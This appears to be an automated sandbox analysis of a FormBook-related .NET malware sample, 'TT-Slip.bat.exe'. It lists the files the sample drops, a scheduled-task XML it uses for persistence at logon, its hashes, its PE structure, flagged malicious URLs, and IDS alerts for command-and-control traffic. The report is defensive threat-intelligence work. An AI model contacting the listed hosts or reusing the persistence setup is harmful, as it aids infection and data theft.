	https://deutsche-post-verfolgung.com/	Get hash	malicious	Unknown	Browse	31.184.253.138
	file.exe	Get hash	malicious	SmokeLoader	Browse	31.184.254.98
	http://alphosoft.com	Get hash	malicious	Unknown	Browse	188.68.221.152
	https://marvin-occentus.net	Get hash	malicious	Unknown	Browse	31.184.209.76
	mod01_pdf.lnk	Get hash	malicious	Unknown	Browse	5.53.124.165
	http://funcallback.com	Get hash	malicious	Unknown	Browse	80.249.144.188
	https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjIu4G40omGAxX3s1YBHWXNAEAQFnoECAcQAQ&url=https%3A%2F%2Fwww.2020fireprotection.com.au%2F&usg=AOvVaw3wjj5en9DdUhWZbjtqllzT&opi=89978449	Get hash	malicious	Unknown	Browse	80.249.144.188
	https://primecargohub.com	Get hash	malicious	GRQ Scam	Browse	31.184.253.65

Process:	C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TT-Slip.bat.exe.log

Download File

Process:	C:\Users\user\Desktop\TT-Slip.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	16AD599332DD2FF94DA0787D71688B62
SHA1:	02F738694B02E84FFE3BAB7DE5709001823C6E40
SHA-256:	452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
SHA-512:	A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\66159w4

Download File

Process:	C:\Windows\SysWOW64\compact.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyhttayg.0t0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftmyq5rb.krh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iizsztyd.cds.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qh1yuib0.bxk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxarehal.vhh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtoao1ar.5gy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt4c3ofi.5kh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3pjkutn.434.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp

Download File

Process:	C:\Users\user\Desktop\TT-Slip.bat.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1587
Entropy (8bit):	5.113948975225561
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtY1xvn:cgergYrFdOFzOzN33ODOiDdKrsuTYLv
MD5:	CA40942EB0E5EE4CBD872B906E689748
SHA1:	34F890F538CC4A25C9B8DD28256F05A5436DBB1B
SHA-256:	F56C34DA822CCFC6A2EA98BC8916CF4FF02186F345C08BB75A1D1138312127E3
SHA-512:	4205C7C1A097D54E362E0CF236CE313754720ECCF97E6605AD249F8685413859CE916D9E83BEA0E906CFE5329072A4A48FBBC10FAD4FCF6494E3CE6EE16D1090
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpBA10.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1587
Entropy (8bit):	5.113948975225561
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtY1xvn:cgergYrFdOFzOzN33ODOiDdKrsuTYLv
MD5:	CA40942EB0E5EE4CBD872B906E689748
SHA1:	34F890F538CC4A25C9B8DD28256F05A5436DBB1B
SHA-256:	F56C34DA822CCFC6A2EA98BC8916CF4FF02186F345C08BB75A1D1138312127E3
SHA-512:	4205C7C1A097D54E362E0CF236CE313754720ECCF97E6605AD249F8685413859CE916D9E83BEA0E906CFE5329072A4A48FBBC10FAD4FCF6494E3CE6EE16D1090
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe

Download File

Process:	C:\Users\user\Desktop\TT-Slip.bat.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	743424
Entropy (8bit):	7.97052452001798
Encrypted:	false
SSDEEP:	12288:SoeKkzdrJwKcIF3LTJHYDr9L7/tf65e4MX+bxqGYwNvWY9irqc/flZI2kfx8d:4cELTJ6r9PwhLbAGYwQQU62kfx
MD5:	0C7240337B784ADD7B481B55E4326E66
SHA1:	5ECEBE1F9847FA2B9B1374F85F11BE0D98AE13C2
SHA-256:	2E0C808B08F36E34E0E37530C8B5D4080FB654BDF12CAE1E17A2ADBDACE21CD7
SHA-512:	434B9A08F79979A9DDB4CCD87464CDDC99A5DF7BB6C56A550424F879787F20EE7468AA4DD4DEADEA741F76DAE16590AD18C661C26B239F2C3EAE9ACA95F64872
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-.Wf..............0..0...$.......N... ...`....@.. ....................................@.................................PN..O....`............................................................................... ............... ..H............text........ ...0.................. ..`.rsrc........`... ...4..............@..@.reloc...............T..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\TT-Slip.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.97052452001798
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	TT-Slip.bat.exe
File size:	743'424 bytes
MD5:	0c7240337b784add7b481b55e4326e66
SHA1:	5ecebe1f9847fa2b9b1374f85f11be0d98ae13c2
SHA256:	2e0c808b08f36e34e0e37530c8b5d4080fb654bdf12cae1e17a2adbdace21cd7
SHA512:	434b9a08f79979a9ddb4ccd87464cddc99a5df7bb6c56a550424f879787f20ee7468aa4dd4deadea741f76dae16590ad18c661c26b239f2c3eae9aca95f64872
SSDEEP:	12288:SoeKkzdrJwKcIF3LTJHYDr9L7/tf65e4MX+bxqGYwNvWY9irqc/flZI2kfx8d:4cELTJ6r9PwhLbAGYwQQU62kfx
TLSH:	8AF42218353CD94BD4B502F60AB98B420BF1A0272D1EE6DD1CB1C1847DE7F2297A9B67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-.Wf..............0..0...$.......N... ...`....@.. ....................................@................................

File Icon


Icon Hash:	990c17132b0f3331

Static PE Info

General

Entrypoint:	0x4b4ea2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6657D02D [Thu May 30 01:02:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb4e50	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb6000	0x1e0c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb2ea8	0xb3000	bf63be2655880ce406cd4f89307e0fbb	False	0.9713905377094972	data	7.979128600620661	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb6000	0x1e0c	0x2000	96db6b9047df9bd906b91b0f1c18ec1f	False	0.8685302734375	data	7.43815753360624	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x400	0003fece1844d01273ad16b1e47d7830	False	0.025390625	data	0.05585530805374581	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb60c8	0x1acf	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9814949730438584
RT_GROUP_ICON	0xb7ba8	0x14	data	1.05
RT_VERSION	0xb7bcc	0x23c	data	0.47027972027972026

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/30/24-15:01:53.884972	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49715	80	192.168.2.5	195.35.39.119
05/30/24-15:04:54.737507	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49757	80	192.168.2.5	66.96.162.149
05/30/24-15:02:39.788191	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49726	80	192.168.2.5	64.46.118.35
05/30/24-15:03:41.711791	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49741	80	192.168.2.5	15.204.0.108
05/30/24-15:02:54.714138	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49730	80	192.168.2.5	54.179.173.60
05/30/24-15:05:02.336329	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49760	80	192.168.2.5	66.96.162.149
05/30/24-15:04:48.666326	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49756	80	192.168.2.5	18.178.206.118
05/30/24-15:03:21.696469	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49736	80	192.168.2.5	162.0.213.94
05/30/24-15:03:49.320168	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49744	80	192.168.2.5	15.204.0.108
05/30/24-15:04:07.804662	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49746	80	192.168.2.5	194.9.94.86
05/30/24-15:04:12.883535	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49748	80	192.168.2.5	194.9.94.86
05/30/24-15:04:26.490746	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49752	80	192.168.2.5	35.214.235.206
05/30/24-15:01:53.884972	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49715	80	192.168.2.5	195.35.39.119
05/30/24-15:02:26.075643	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49722	80	192.168.2.5	185.137.235.125
05/30/24-15:03:44.240922	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49742	80	192.168.2.5	15.204.0.108
05/30/24-15:04:26.490746	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49752	80	192.168.2.5	35.214.235.206
